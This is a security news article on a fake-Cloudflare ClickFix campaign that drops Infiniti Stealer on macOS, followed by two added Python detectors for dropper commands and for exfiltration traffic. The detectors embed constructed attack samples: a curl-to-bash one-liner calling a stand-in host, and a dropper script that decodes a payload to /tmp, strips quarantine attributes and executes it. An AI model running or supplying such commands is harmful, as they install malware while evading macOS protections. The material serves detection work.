Fake Cloudflare ClickFix Campaign Spreads Infiniti Stealer Malware on macOS


Monday, March 30, 2026

Security researchers at Malwarebytes have reported a new ClickFix campaign that targets macOS users by impersonating Cloudflare verification pages to deliver a Python-based information stealer. The attack begins by luring the victim to a fake CAPTCHA page that closely mimics a legitimate Cloudflare check. The page then uses social engineering to get the user to copy a command and run it in Terminal. Because the user runs the command themselves, the fetched script executes with that user's privileges and bypasses the download prompts and warnings a browser would otherwise show. The ClickFix technique has been in wide use since August 2024, primarily against Windows users; in recent months it has been adapted to target macOS users more convincingly.

Once the command is executed, a Bash script is downloaded from an external server. The script decodes an embedded payload, writes the resulting binary into a temporary directory, and strips its extended attributes before running it; on macOS that removes the quarantine flag a downloaded file would normally carry, so Gatekeeper never inspects it. The dropped binary is a loader compiled with Nuitka, which turns Python source into a native executable and makes static analysis harder than it would be for plain Python bytecode. The loader then extracts and executes the final payload, known as Infiniti Stealer.
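The dropper chain described above (remote script fetched into a shell, an embedded payload decoded into a temp directory, extended attributes stripped, the file executed) is concrete enough to triage from command lines and script bodies. The following is an added example, not code from the article or from Malwarebytes: each step becomes a regex indicator, and a snippet is scored by which indicators co-occur. The sample snippets, URLs and file names below are constructed for the example.

```python
"""Heuristic triage for ClickFix-style shell snippets and dropper scripts.

Added example, not the article's or Malwarebytes' code. Indicator weights,
the alert threshold, and every sample string are assumptions made for
illustration.
"""
import re
from typing import NamedTuple


class Indicator(NamedTuple):
    name: str
    weight: int
    pattern: re.Pattern


TMP_DIRS = r"(?:/tmp|/private/tmp|/var/folders|\$TMPDIR|\$\{TMPDIR\})"

INDICATORS = [
    # A remote script piped into, or command-substituted into, a shell.
    Indicator("remote_exec", 3, re.compile(
        r"(?:curl|wget)\b[^|;\n]*\|\s*(?:ba|z)?sh\b|\$\(\s*(?:curl|wget)\b")),
    # An embedded payload decoded and redirected into a temp directory.
    Indicator("b64_drop_tmp", 3, re.compile(
        r"base64\s+(?:-d|-D|--decode)\b[^\n]*>\s*" + TMP_DIRS)),
    # Extended attributes removed: on macOS this clears com.apple.quarantine,
    # so Gatekeeper never looks at the dropped file.
    Indicator("xattr_strip", 3, re.compile(
        r"xattr\s+(?:-rc|-c|-d\s+com\.apple\.quarantine)\b")),
    Indicator("chmod_exec", 1, re.compile(r"chmod\s+(?:[ugoa]*\+x|[0-7]{3,4})\b")),
    # A path under a temp directory invoked as a command.
    Indicator("tmp_exec", 2, re.compile(
        r"(?:^|[;&|]\s*|\bnohup\s+)" + TMP_DIRS + r"/\S+", re.MULTILINE)),
]

SUSPICIOUS_THRESHOLD = 3   # assumed tuning values
ALERT_THRESHOLD = 5


def analyze(snippet: str) -> dict:
    """Return the matched indicators, a score, and a verdict for one snippet."""
    hits = sorted(i.name for i in INDICATORS if i.pattern.search(snippet))
    score = sum(i.weight for i in INDICATORS if i.name in hits)
    # Decode-to-temp plus execute-from-temp, with the file made runnable in
    # between, is the dropper shape regardless of the total score.
    chain = ("b64_drop_tmp" in hits and "tmp_exec" in hits
             and ("xattr_strip" in hits or "chmod_exec" in hits))
    if chain or score >= ALERT_THRESHOLD:
        verdict = "alert"
    elif score >= SUSPICIOUS_THRESHOLD:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"hits": hits, "score": score, "drop_and_run_chain": chain,
            "verdict": verdict}


# Constructed samples; the host example.invalid and the file .cf_loader are
# made up for the example.
CLICKFIX_PASTE = '/bin/bash -c "$(curl -fsSL https://example.invalid/verify.sh)"'

DROPPER_SAMPLE = """#!/bin/bash
PAYLOAD='TUhGYWtlUGF5bG9hZA=='
echo "$PAYLOAD" | base64 -d > /tmp/.cf_loader
xattr -c /tmp/.cf_loader
chmod +x /tmp/.cf_loader
/tmp/.cf_loader &
"""

BENIGN_SAMPLE = """git status
ls -la
base64 -d keyfile.b64 > key.pem
curl -o report.pdf https://example.invalid/report.pdf
"""

if __name__ == "__main__":
    for label, sample in (("paste", CLICKFIX_PASTE), ("dropper", DROPPER_SAMPLE),
                          ("benign", BENIGN_SAMPLE)):
        print(label, analyze(sample))
```

The pasted one-liner alone only rates "suspicious": the Homebrew installer is invoked with exactly the same `bash -c "$(curl ...)"` shape, so a rule that fires on that pattern by itself will page on every developer laptop. Pair it with context (a Terminal process spawned shortly after a browser visit, or a paste event) and reserve the hard alert for the decode-to-temp, strip-attributes, execute chain, which has no common legitimate counterpart.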

Infiniti Stealer can exfiltrate a wide range of sensitive data, including browser credentials, Keychain data, cryptocurrency wallets, developer secrets, and screenshots captured while it runs. The stolen data is sent to a command-and-control (C2) server via HTTP POST requests, and notifications are sent through Telegram channels. The malware also employs evasion techniques such as randomized execution delays and environment checks intended to detect analysis or sandbox environments. The researchers note that this campaign is an evolution of techniques that were previously effective against Windows users, now adapted to macOS with more sophisticated evasion and resistance to analysis.
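The exfiltration side gives a second, network-facing place to detect this: bulk HTTP POST traffic from an unexpected process, and calls to the Telegram Bot API. The following is an added example, not code from the article or from Malwarebytes. The record format (one request per line, space-separated key=value fields) is a constructed stand-in for whatever an EDR or egress proxy emits, and every host, path, token and process name in the sample is made up. It assumes the Telegram leg of the campaign uses the Bot API, whose endpoint is https://api.telegram.org/bot<token>/<method>; the article only says notifications go out via Telegram.

```python
"""Flag stealer-style exfiltration in outbound HTTP request records.

Added example, not the article's or Malwarebytes' code. The log format,
the byte threshold, and the Bot API assumption are illustrative.
"""
import re
from collections import defaultdict

# Bot API path: /bot<numeric id>:<secret>/<method>. Assumed, see lead-in.
TELEGRAM_BOT_API = re.compile(r"^/bot\d+:[A-Za-z0-9_-]+/(?:sendMessage|sendDocument)")
TELEGRAM_HOST = "api.telegram.org"
POST_BYTES_THRESHOLD = 200_000  # assumed tuning value for a single workstation


def parse_record(line: str) -> dict:
    """Split 'k=v k=v ...' into a dict (values in this format carry no spaces)."""
    return dict(field.split("=", 1) for field in line.split())


def find_exfil(lines, allow_hosts=frozenset()):
    """Return sorted (kind, process, host) findings for a batch of records.

    POST bytes are summed per (process, host) over the whole batch rather than
    checked per request: the stealer's randomized delays spread uploads out, but
    the total it must move does not shrink.
    """
    findings = set()
    post_bytes = defaultdict(int)
    for line in lines:
        rec = parse_record(line)
        if rec.get("method") != "POST":
            continue
        host = rec["host"]
        proc = rec.get("proc", "?")
        path = rec.get("path", "/")
        if host == TELEGRAM_HOST and TELEGRAM_BOT_API.match(path):
            findings.add(("telegram_bot_api", proc, host))
        if host not in allow_hosts:
            post_bytes[(proc, host)] += int(rec.get("bytes", 0))
    for (proc, host), total in post_bytes.items():
        if total >= POST_BYTES_THRESHOLD:
            findings.add(("bulk_post", proc, host))
    return sorted(findings)


# Constructed records. 203.0.113.10 is a documentation-range address and
# .cf_loader a made-up process name standing in for the dropped binary.
SAMPLE_LOG = [
    "ts=1 proc=Safari method=GET host=www.apple.com path=/ bytes=0",
    "ts=2 proc=.cf_loader method=POST host=203.0.113.10 path=/upload bytes=120000",
    "ts=3 proc=Slack method=POST host=slack.com path=/api/chat.postMessage bytes=800",
    "ts=4 proc=.cf_loader method=POST host=api.telegram.org "
    "path=/bot123456:AAExampleToken/sendMessage bytes=300",
    "ts=5 proc=.cf_loader method=POST host=203.0.113.10 path=/upload bytes=95000",
]

if __name__ == "__main__":
    for finding in find_exfil(SAMPLE_LOG, allow_hosts=frozenset({"slack.com"})):
        print(*finding)
```

Allowlist the collaboration and update hosts your fleet legitimately POSTs to in volume, and key the byte aggregate on the process as well as the host: a browser uploading a file and an unknown binary in a temp directory talking to the same CDN are different findings.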

Source: https://www.securityweek.com/cloudflare-themed-clickfix-attack-drops-infiniti-stealer-on-macs/